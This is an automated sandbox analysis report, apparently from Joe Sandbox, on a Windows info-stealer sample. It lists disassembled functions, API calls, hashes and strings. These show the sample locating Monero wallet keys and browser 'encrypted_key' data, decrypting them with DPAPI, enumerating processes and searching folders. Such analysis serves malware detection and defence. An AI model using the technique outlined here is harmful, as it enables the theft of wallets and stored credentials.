                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 65771bdc68a9187a9caf85218a5d06b86623833c1d18410fd7d65b7bdd2cebab
                              • Instruction ID: f210b454b82064497510ed28b199a431e762f0733be16bba8ea34e94751724f1
                              • Opcode Fuzzy Hash: 65771bdc68a9187a9caf85218a5d06b86623833c1d18410fd7d65b7bdd2cebab
                              • Instruction Fuzzy Hash: 8D910E72910508ABCB06FBA4DCD6EEE7738AF14300F504168F547BE091EF746A49DB62
                              Function 0032D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                                • Part of subcall function 00338B60: GetSystemTime.KERNEL32(00340E1A,0109A450,003405AE,?,?,003213F9,?,0000001A,00340E1A,00000000,?,01099048,?,\Monero\wallet.keys,00340E17), ref: 00338B86
                                • Part of subcall function 0033A920: lstrcpy.KERNEL32(00000000,?), ref: 0033A972
                                • Part of subcall function 0033A920: lstrcat.KERNEL32(00000000), ref: 0033A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0032D801
                              • lstrlen.KERNEL32(00000000), ref: 0032D99F
                              • lstrlen.KERNEL32(00000000), ref: 0032D9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 0032DA32
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 490a6fb5d1d45df01944b2a0ba60d43bcd84006fada8657b0666d610b3e3c613
                              • Instruction ID: 0ee7f110fc1197604ed7b130c87ef1c6a63b1c5fd32fa6fecbaeef13641a8dfe
                              • Opcode Fuzzy Hash: 490a6fb5d1d45df01944b2a0ba60d43bcd84006fada8657b0666d610b3e3c613
                              • Instruction Fuzzy Hash: E0810D72910508ABCB06FBA4DCD6EEE7738AF14300F504128F547BE091EF746A49DBA2
                              Function 0032F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0033A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0033A7E6
                                • Part of subcall function 003299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003299EC
                                • Part of subcall function 003299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00329A11
                                • Part of subcall function 003299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00329A31
                                • Part of subcall function 003299C0: ReadFile.KERNEL32(000000FF,?,00000000,0032148F,00000000), ref: 00329A5A
                                • Part of subcall function 003299C0: LocalFree.KERNEL32(0032148F), ref: 00329A90
                                • Part of subcall function 003299C0: CloseHandle.KERNEL32(000000FF), ref: 00329A9A
                                • Part of subcall function 00338E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00338E52
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                                • Part of subcall function 0033A920: lstrcpy.KERNEL32(00000000,?), ref: 0033A972
                                • Part of subcall function 0033A920: lstrcat.KERNEL32(00000000), ref: 0033A982
                              • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00341580,00340D92), ref: 0032F54C
                              • lstrlen.KERNEL32(00000000), ref: 0032F56B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 998311485-3310892237
                              • Opcode ID: 0b3e4ebcccaa6cf2c8a17bd46dc13f1a227ad49d5c144666d8e60586ceee980e
                              • Instruction ID: 383a80869a6bdeaf0905d6f5a80b437f75612f318d2bd86adb0fc163e2b70593
                              • Opcode Fuzzy Hash: 0b3e4ebcccaa6cf2c8a17bd46dc13f1a227ad49d5c144666d8e60586ceee980e
                              • Instruction Fuzzy Hash: EC510171D10608AADB06FBB4DCD6DED7778AF54300F408528F8566F191EF346A09DBA2
                              Function 003370D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 140COMMON
                              Download Yara Rule
                              Strings
                              • s3, xrefs: 003372AE, 00337179, 0033717C
                              • s3, xrefs: 00337111
                              • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0033718C
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID: s3$s3$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                              • API String ID: 3722407311-3620656206
                              • Opcode ID: b09871c626b5a98c09e976e967e86f43522dd4a8b6740f543595486084c4c82d
                              • Instruction ID: 6c5101aaded8a9ecab0c30cecc3f5ce64e418130ca1cf7ccce1b6e37bf5654fa
                              • Opcode Fuzzy Hash: b09871c626b5a98c09e976e967e86f43522dd4a8b6740f543595486084c4c82d
                              • Instruction Fuzzy Hash: DB519EB1D04218ABDB25EB90DCD5BEEB3B4EF54304F1044A8E215BB181EB746E88DF59
                              Function 00333560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: 1b340eb11fe805144915acccf629cc0d207e54fb5a7b957917a2117a676f179b
                              • Instruction ID: 8f7b58763985150b4b71c3203516cc79a1020a1717b92fe4722c6a84a7197fc2
                              • Opcode Fuzzy Hash: 1b340eb11fe805144915acccf629cc0d207e54fb5a7b957917a2117a676f179b
                              • Instruction Fuzzy Hash: B84121B1D10109AFCB05EFE4D8C6AEEB7B8AF54304F008418F5167B251DB75AA49DFA2
                              Function 00329CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 003299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003299EC
                                • Part of subcall function 003299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00329A11
                                • Part of subcall function 003299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00329A31
                                • Part of subcall function 003299C0: ReadFile.KERNEL32(000000FF,?,00000000,0032148F,00000000), ref: 00329A5A
                                • Part of subcall function 003299C0: LocalFree.KERNEL32(0032148F), ref: 00329A90
                                • Part of subcall function 003299C0: CloseHandle.KERNEL32(000000FF), ref: 00329A9A
                                • Part of subcall function 00338E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00338E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00329D39
                                • Part of subcall function 00329AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N2,00000000,00000000), ref: 00329AEF
                                • Part of subcall function 00329AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00324EEE,00000000,?), ref: 00329B01
                                • Part of subcall function 00329AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N2,00000000,00000000), ref: 00329B2A
                                • Part of subcall function 00329AC0: LocalFree.KERNEL32(?,?,?,?,00324EEE,00000000,?), ref: 00329B3F
                                • Part of subcall function 00329B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00329B84
                                • Part of subcall function 00329B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00329BA3
                                • Part of subcall function 00329B60: LocalFree.KERNEL32(?), ref: 00329BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: bf6ce8762bb29f74acd6091b32148660bc78b27af8cded630955726e9301527d
                              • Instruction ID: 8c41752e6675bbbb1366c212a54cd18442d05362d3d024e6cb01e20046bdb73d
                              • Opcode Fuzzy Hash: bf6ce8762bb29f74acd6091b32148660bc78b27af8cded630955726e9301527d
                              • Instruction Fuzzy Hash: D9312DB6D10219ABCF05DFE4EC85BEFB7B8AF48304F144519E905AB241EB749A44CBA1
                              Function 00338680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,003405B7), ref: 003386CA
                              • Process32First.KERNEL32(?,00000128), ref: 003386DE
                              • Process32Next.KERNEL32(?,00000128), ref: 003386F3
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                              • CloseHandle.KERNEL32(?), ref: 00338761
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: 7f800a377480978e1f402355e530103801a786b4b4b68ae14bac8b4b7496526e
                              • Instruction ID: e3872019d27e361dd03ee3f5e6f42023bb212e936d198c084b9d963d8cd24f4e
                              • Opcode Fuzzy Hash: 7f800a377480978e1f402355e530103801a786b4b4b68ae14bac8b4b7496526e
                              • Instruction Fuzzy Hash: 75314B71901618ABCB26DF94DC85FEEB7B8EF45700F104199F10ABA1A0DF746A45CFA1
                              Function 00337980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00340E00,00000000,?), ref: 003379B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 003379B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,00340E00,00000000,?), ref: 003379C4
                              • wsprintfA.USER32 ref: 003379F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: fca16f3024e520496eb1b6f2243dd7a77885cef7d308009686b9146d6ec89fb1
                              • Instruction ID: c76760fde2c58c699843d09f0734434d631e9f4f69078a9b0da07666eb052add
                              • Opcode Fuzzy Hash: fca16f3024e520496eb1b6f2243dd7a77885cef7d308009686b9146d6ec89fb1
                              • Instruction Fuzzy Hash: E91127B2904118ABCB14DFC9DD45BBEB7F8FB4CB11F10421AF605A3280E2795944DBB1
                              Function 0033C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • __getptd.LIBCMT ref: 0033C74E
                                • Part of subcall function 0033BF9F: __amsg_exit.LIBCMT ref: 0033BFAF
                              • __getptd.LIBCMT ref: 0033C765
                              • __amsg_exit.LIBCMT ref: 0033C773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 0033C797
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: f54b38eb2b80e83ac15594c852c347a531e50a9da5b56ceb3b74ef9365ed883a
                              • Instruction ID: b3f6a5398e2e0c14e11de05395408134b82093d749702d650594f170711a01eb
                              • Opcode Fuzzy Hash: f54b38eb2b80e83ac15594c852c347a531e50a9da5b56ceb3b74ef9365ed883a
                              • Instruction Fuzzy Hash: BAF0BE329147009FD723BBB89CC7B5EB3A06F00721F255249FA04BE2D2CF6469419F56
                              Function 00334F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00338DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00338E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00334F7A
                              • lstrcat.KERNEL32(?,00341070), ref: 00334F97
                              • lstrcat.KERNEL32(?,01098F88), ref: 00334FAB
                              • lstrcat.KERNEL32(?,00341074), ref: 00334FBD
                                • Part of subcall function 00334910: wsprintfA.USER32 ref: 0033492C
                                • Part of subcall function 00334910: FindFirstFileA.KERNEL32(?,?), ref: 00334943
                                • Part of subcall function 00334910: StrCmpCA.SHLWAPI(?,00340FDC), ref: 00334971
                                • Part of subcall function 00334910: StrCmpCA.SHLWAPI(?,00340FE0), ref: 00334987
                                • Part of subcall function 00334910: FindNextFileA.KERNEL32(000000FF,?), ref: 00334B7D
                                • Part of subcall function 00334910: FindClose.KERNEL32(000000FF), ref: 00334B92
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
